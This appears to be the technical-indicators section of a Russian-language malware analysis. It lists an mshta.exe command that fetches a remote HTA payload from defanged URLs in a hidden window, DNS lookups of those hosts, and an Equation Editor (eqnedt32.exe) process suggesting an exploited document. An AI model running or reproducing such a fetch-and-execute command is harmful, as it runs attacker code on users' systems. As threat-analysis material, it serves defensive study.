Техническая информация
- '%WINDIR%\syswow64\mshta.exe' http://bi#.ly/2LgSUql &AAAAAAAAAAAAAAAC
- http://bi#.ly/2LgSUql
- http://ne##ux.in/av/cu.hta
- DNS ASK bi#.ly
- DNS ASK ne##ux.in
- '%WINDIR%\syswow64\mshta.exe' http://bi#.ly/2LgSUql &AAAAAAAAAAAAAAAC' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding